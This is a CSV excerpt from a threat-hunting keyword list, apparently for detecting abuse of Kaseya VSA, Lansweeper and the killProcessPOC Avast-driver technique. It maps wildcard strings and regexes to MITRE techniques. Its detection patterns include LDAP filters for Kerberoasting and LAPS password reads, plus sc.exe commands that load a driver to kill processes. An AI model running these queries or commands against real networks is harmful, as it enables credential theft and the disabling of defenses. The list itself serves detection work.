TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*PCMonitorEng.dll*",".{0,1000}PCMonitorEng\.dll.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*PCMonitorManager.exe*",".{0,1000}PCMonitorManager\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is 
a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*PCMonitorManager.exe*",".{0,1000}PCMonitorManager\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*PCMONITORMANAGER.EXE-*.pf*",".{0,1000}PCMONITORMANAGER\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*PCMonitorSrv.exe*",".{0,1000}PCMonitorSrv\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*PCMonitorSrv.exe*",".{0,1000}PCMonitorSrv\.exe.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused 
by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*PCMONITORSRV.EXE-*.pf*",".{0,1000}PCMONITORSRV\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*PCMonitorSrv.InstallState*",".{0,1000}PCMonitorSrv\.InstallState.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*PCMonitorTypes.dll*",".{0,1000}PCMonitorTypes\.dll.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*pcmontask.exe *",".{0,1000}pcmontask\.exe\s.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*PCMONTASK.EXE-*.pf*",".{0,1000}PCMONTASK\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*pcmrdp-client.dll*",".{0,1000}pcmrdp\-client\.dll.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Program Files\VSA X\*",".{0,1000}Program\sFiles\\VSA\sX\\.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ProgramData\Kaseya\*",".{0,1000}ProgramData\\Kaseya\\.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemoteDesktop.exe 
*",".{0,1000}RemoteDesktop\.exe\s.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemoteDesktop_x64 (1).msi*",".{0,1000}RemoteDesktop_x64\s\(1\)\.msi.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemoteDesktop_x64.msi*",".{0,1000}RemoteDesktop_x64\.msi.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SC QUERYEX ""PC Monitor""*",".{0,1000}SC\s\sQUERYEX\s\""PC\sMonitor\"".{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SC QUERYEX ""VSAX""*",".{0,1000}SC\s\sQUERYEX\s\""VSAX\"".{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System 
Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'ServiceName'>VSA X*",".{0,1000}\'ServiceName\'\>VSA\sX\<\/Data\>.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'ServiceName'>VSAX*",".{0,1000}\'ServiceName\'\>VSAX\<\/Data\>.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'VSA X Manager*",".{0,1000}\'VSA\sX\sManager.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'VSA X Remote Control'*",".{0,1000}\'VSA\sX\sRemote\sControl\'.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and 
IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'VSA X Service'*",".{0,1000}\'VSA\sX\sService\'.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'VSA X User Agent'*",".{0,1000}\'VSA\sX\sUser\sAgent\'.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*vsxrc-client.dll*",".{0,1000}vsxrc\-client\.dll.{0,1000}","greyware_tool_keyword","kaseya VSA","Kaseya VSA (Virtual System Administrator) is a cloud-based IT management and remote monitoring software designed for managed service providers (MSPs) and IT departments -it is abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.kaseya.com/products/vsa/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/killProcessPOC.git*",".{0,1000}\/killProcessPOC\.git.{0,1000}","greyware_tool_keyword","killProcessPOC","use Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense 
Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z" "*\\\\.\\aswSP_ArPot0*",".{0,1000}\\\\\\\\\.\\\\aswSP_ArPot0.{0,1000}","greyware_tool_keyword","killProcessPOC","use Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z" "*\\\\.\\aswSP_ArPot1*",".{0,1000}\\\\\\\\\.\\\\aswSP_ArPot1.{0,1000}","greyware_tool_keyword","killProcessPOC","use Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z" "*\\\\.\\aswSP_ArPot2*",".{0,1000}\\\\\\\\\.\\\\aswSP_ArPot2.{0,1000}","greyware_tool_keyword","killProcessPOC","use Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z" "*\\\\.\\aswSP_ArPot3*",".{0,1000}\\\\\\\\\.\\\\aswSP_ArPot3.{0,1000}","greyware_tool_keyword","killProcessPOC","use Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - 
T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z" "*\\\\.\\aswSP_Avar*",".{0,1000}\\\\\\\\\.\\\\aswSP_Avar.{0,1000}","greyware_tool_keyword","killProcessPOC","use Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z" "*\killProcessPOC*",".{0,1000}\\killProcessPOC.{0,1000}","greyware_tool_keyword","killProcessPOC","use Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z" "*55ab03a0f7e3ce2c13664db76e5e0b6768cb66d88971b6bc6caf577831a77a23*",".{0,1000}55ab03a0f7e3ce2c13664db76e5e0b6768cb66d88971b6bc6caf577831a77a23.{0,1000}","greyware_tool_keyword","killProcessPOC","use Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","#filehash","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z" "*sc.exe create 
aswSP_ArPot1*",".{0,1000}sc\.exe\screate\saswSP_ArPot1.{0,1000}","greyware_tool_keyword","killProcessPOC","use Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z" "*sc.exe create aswSP_ArPot2*",".{0,1000}sc\.exe\screate\saswSP_ArPot2.{0,1000}","greyware_tool_keyword","killProcessPOC","use Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z" "*sc.exe create aswSP_ArPot3*",".{0,1000}sc\.exe\screate\saswSP_ArPot3.{0,1000}","greyware_tool_keyword","killProcessPOC","use Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z" "*sc.exe create aswSP_ArPots*",".{0,1000}sc\.exe\screate\saswSP_ArPots.{0,1000}","greyware_tool_keyword","killProcessPOC","use Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense 
Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z" "*sc.exe start aswSP_ArPot*",".{0,1000}sc\.exe\sstart\saswSP_ArPot.{0,1000}","greyware_tool_keyword","killProcessPOC","use Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z" "*timwhitez/killProcessPOC*",".{0,1000}timwhitez\/killProcessPOC.{0,1000}","greyware_tool_keyword","killProcessPOC","use Avast (aswArPot.sys) to kill process - exploited by MONTI ransomware","T1055 - T1106 - T1560.002 - T1569","TA0005","Monti ransomware","N/A","Defense Evasion","https://github.com/timwhitez/killProcessPOC","1","0","N/A","https://www.withsecure.com/content/dam/with-secure/en/resources/WS_Professionalisation_of_CyberCrime_EN.pdf","10","1","64","8","2022-08-26T03:20:09Z","2022-04-27T08:25:50Z" "*/LansweeperSetup_*.exe*",".{0,1000}\/LansweeperSetup_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","1","N/A","N/A","6","7","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\lansweeper-*",".{0,1000}\\AppData\\Local\\Temp\\lansweeper\-.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - 
T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","0","N/A","N/A","6","7","N/A","N/A","N/A","N/A" "*\LansweeperService.exe*",".{0,1000}\\LansweeperService\.exe.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","0","N/A","N/A","6","7","N/A","N/A","N/A","N/A" "*\LansweeperSetup_*.exe*",".{0,1000}\\LansweeperSetup_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","0","N/A","N/A","6","7","N/A","N/A","N/A","N/A" "*\Program Files (x86)\Lansweeper*",".{0,1000}\\Program\sFiles\s\(x86\)\\Lansweeper.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","0","N/A","N/A","6","7","N/A","N/A","N/A","N/A" "*>Lansweeper Setup<*",".{0,1000}\>Lansweeper\sSetup\<.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","0","#description","N/A","6","7","N/A","N/A","N/A","N/A" "*>Lansweeper<*",".{0,1000}\>Lansweeper\<.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","0","#productname","N/A","6","7","N/A","N/A","N/A","N/A" 
"*https://update.lansweeper.com/installation.aspx*",".{0,1000}https\:\/\/update\.lansweeper\.com\/installation\.aspx.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","1","N/A","N/A","6","7","N/A","N/A","N/A","N/A" "*https://www.lansweeper.com/installation.aspx*",".{0,1000}https\:\/\/www\.lansweeper\.com\/installation\.aspx.{0,1000}","greyware_tool_keyword","Lansweeper","Lansweeper discovers and inventories IT assets - gathering system - software and user data - abused by attackers","T1016 - T1082","TA0007","N/A","EvilCorp*","Discovery","https://www.lansweeper.com/","1","1","N/A","N/A","6","7","N/A","N/A","N/A","N/A" "*(&(&(objectCategory=person)(objectClass=user))(|(description=*pass*)(comment=*pass*)))*",".{0,1000}\(\&\(\&\(objectCategory\=person\)\(objectClass\=user\)\)\(\|\(description\=.{0,1000}pass.{0,1000}\)\(comment\=.{0,1000}pass.{0,1000}\)\)\).{0,1000}","greyware_tool_keyword","ldap queries","metasploit enum_ad_user_comments","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726","1","0","N/A","N/A","8","4","N/A","N/A","N/A","N/A" "*(&(objectCategory=computer)(msDS-isRODC=TRUE))*",".{0,1000}\(\&\(objectCategory\=computer\)\(msDS\-isRODC\=TRUE\)\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate Read-Only Domain Controllers (RODC)","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/mthcht/ThreatHunting-Keywords","1","0","N/A","N/A","8","5","425","51","2024-08-24T11:38:32Z","2023-05-16T15:38:26Z" 
"*(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName="" + target + ""))*",".{0,1000}\(\&\(objectCategory\=computer\)\(ms\-MCS\-AdmPwd\=.{0,1000}\)\(sAMAccountName\=\""\s\+\starget\s\+\s\""\)\).{0,1000}","greyware_tool_keyword","ldap queries","LAPS passwords (from SharpLAPS)","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://gist.github.com/jsecurity101/9c7e94f95b8d90f9252d64949562ba5d","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536)(memberOf=CN=Administrators*",".{0,1000}\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=65536\)\(memberOf\=CN\=Administrators.{0,1000}","greyware_tool_keyword","ldap queries","Enumerate Accounts with Non-Expiring Passwords and Administrative Privileges","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/mthcht/ThreatHunting-Keywords","1","0","N/A","N/A","8","5","425","51","2024-08-24T11:38:32Z","2023-05-16T15:38:26Z" "*(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536)*",".{0,1000}\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=65536\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate all users with the account configuration 'Password never expires'","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://gist.github.com/jsecurity101/9c7e94f95b8d90f9252d64949562ba5d","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" 
"*(&(objectClass=group)(managedBy=*)(groupType:1.2.840.113556.1.4.803:=2147483648))*",".{0,1000}\(\&\(objectClass\=group\)\(managedBy\=.{0,1000}\)\(groupType\:1\.2\.840\.113556\.1\.4\.803\:\=2147483648\)\).{0,1000}","greyware_tool_keyword","ldap queries","metasploit enum_ad_managedby_groups.rb","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/rapid7/metasploit-framework/blob/d37a82500d1d08f9d8ab3da9b194653835748fae/modules/post/windows/gather/enum_ad_managedby_groups.rb#L59","1","0","N/A","N/A","8","10","33672","13869","2024-08-30T12:23:37Z","2011-08-30T06:13:20Z" "*(&(objectclass=group)(samaccountname=*domain admins*))*",".{0,1000}\(\&\(objectclass\=group\)\(samaccountname\=.{0,1000}domain\sadmins.{0,1000}\)\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate Domain Administrators Group","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://jsecurity101.medium.com/uncovering-adversarial-ldap-tradecraft-658b2deca384","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))*",".{0,1000}\(\&\(samAccountType\=805306368\)\(servicePrincipalName\=.{0,1000}\)\(!samAccountName\=krbtgt\)\(!\(UserAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\(!msds\-supportedencryptiontypes\:1\.2\.840\.113556\.1\.4\.804\:\=24\)\).{0,1000}","greyware_tool_keyword","ldap queries","Kerberoasting","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://gist.github.com/jsecurity101/9c7e94f95b8d90f9252d64949562ba5d","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" 
"*(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))*",".{0,1000}\(\&\(samAccountType\=805306368\)\(servicePrincipalName\=.{0,1000}\)\(!samAccountName\=krbtgt\)\(!\(UserAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\(msds\-supportedencryptiontypes\:1\.2\.840\.113556\.1\.4\.804\:\=24\)\).{0,1000}","greyware_tool_keyword","ldap queries","Kerberoasting","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://gist.github.com/jsecurity101/9c7e94f95b8d90f9252d64949562ba5d","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))*",".{0,1000}\(\&\(samAccountType\=805306368\)\(servicePrincipalName\=.{0,1000}\)\(!samAccountName\=krbtgt\)\(!\(UserAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\).{0,1000}","greyware_tool_keyword","ldap queries","Kerberoasting","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://gist.github.com/jsecurity101/9c7e94f95b8d90f9252d64949562ba5d","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" 